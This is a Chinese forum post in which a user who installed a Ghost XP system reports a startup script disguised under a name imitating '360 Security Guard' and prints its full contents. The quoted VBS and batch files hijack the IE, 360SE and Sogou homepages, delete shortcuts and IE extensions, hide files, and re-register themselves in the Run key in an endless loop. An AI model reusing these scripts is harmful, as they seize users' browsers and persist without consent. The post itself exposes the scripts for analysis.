装了1个ghost版本的xp系统。
在注册表里的run启动项目里面,有个 36O安全卫士.vbs。这个文件路径是C:\WINDOWS
36O安全卫士.vbs文件内容是:- on error resume next
- DIM objShell
- set objShell=wscript.createObject("wscript.shell")
- iReturn=objShell.Run("cmd.exe /C C:\WINDOWS\sys.bat", 0, TRUE)
sys.bat文件内容是:- @reg delete "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /f
- @reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /d "http://www.5208.me/?5" /f
- @reg add "HKEY_USERs\.DEFAULT\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /d "http://www.5208.me/?5" /f
- @reg add "HKEY_USERs\S-1-5-18\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /d "http://www.5208.me/?5" /f
- @reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v "Favorites" /t REG_EXPAND_SZ /d "C:\Documents and Settings\Administrator\Favorites"
- @reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v "Personal" /t REG_EXPAND_SZ /d "C:\Documents and Settings\Administrator\My Documents"
- @reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v "Desktop" /t REG_EXPAND_SZ /d "C:\Documents and Settings\Administrator\桌面"
- wscript.exe C:\WINDOWS\s.vbs
- attrib C:\WINDOWS\RocketDock\Settings.ini +s +r +h
- @reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\run" /f /v "RocketDock" /t REG_SZ /d "C:\WINDOWS\RocketDock\RocketDock.exe"
- copy "C:\WINDOWS\zm\" "C:\Documents and Settings\All Users\桌面\" /y
- del /f /s /q "%appdata%\Microsoft\Internet Explorer\Quick Launch\*.url"
- del /f /s /q "%appdata%\Microsoft\Internet Explorer\Quick Launch\*.lnk"
- copy "C:\WINDOWS\quick\" "%appdata%\Microsoft\Internet Explorer\Quick Launch\" /y
- reg delete "HKEY_CLASSES_ROOT\InternetShortcut" /v IsShortcut /f
- copy "C:\WINDOWS\Favorites\" "c:\Documents and Settings\Administrator\Favorites\" /y
- copy "C:\WINDOWS\Favorites\" "c:\Documents and Settings\All Users\Favorites\" /y
- @reg delete "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions" /f
- regedit -s C:\WINDOWS\gjl.reg
- copy "C:\WINDOWS\TheWorld\Internet Explorer.url" "C:\Documents and Settings\All Users\「开始」菜单\程序\" /y
- @echo off
- :loop
- wscript.exe C:\WINDOWS\,.vbs
- @reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\run" /f /v "36O安全卫士" /t REG_SZ /d "C:\WINDOWS\36O安全卫士.vbs"
- ping 127.1 -n 10 >nul 2>nul
- goto loop
C:\WINDOWS 下面还有个,.vbs,内容是:- on error resume next
- DIM objShell,Fso,TxtFl,Str,re
- Set objShell = CreateObject("WScript.Shell")
- objShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoInternetIcon",1,"REG_DWORD"
- Set Fso = CreateObject("Scripting.FileSystemObject")
- Set TxtFl = Fso.OpenTextFile ("C:\Documents and Settings\Administrator\Application Data\360se\360SE.ini",1,False)
- Set re = new RegExp
- re.Pattern = "\s+HomePage=([\S\s]*?)\s+"
- re.Global = true
- re.IgnoreCase = true
- Str = re.Replace ( TxtFl.ReadAll,vbNewLine+"HomePage=http://www.2345li.com/?3"+vbNewLine)
- TxtFl.Close
- Set TxtFl = Fso.OpenTextFile ("C:\Documents and Settings\Administrator\Application Data\360se\360SE.ini",2,False)
- TxtFl.Write Str
- TxtFl.Close
-
- Set TxtFl = Fso.OpenTextFile ("C:\Documents and Settings\Administrator\Application Data\SogouExplorer\Config.xml",1,True)
- Set re = new RegExp
- re.Pattern = "homepage=""([\S\s]*?)"""
- re.Global = true
- re.IgnoreCase = true
- Str = re.Replace ( TxtFl.ReadAll,"homepage=""http://www.2345li.com/?3""")
- re.Pattern = "homepagetype=""([\S\s]*?)"""
- Str = re.Replace ( Str,"homepagetype=""3""")
- TxtFl.Close
- Set TxtFl = Fso.OpenTextFile ("C:\Documents and Settings\Administrator\Application Data\SogouExplorer\Config.xml",2,True)
- TxtFl.Write Str
- TxtFl.Close
| 
发表于 2011-7-5 11:28
| 
发表于 2011-7-5 11:50
| 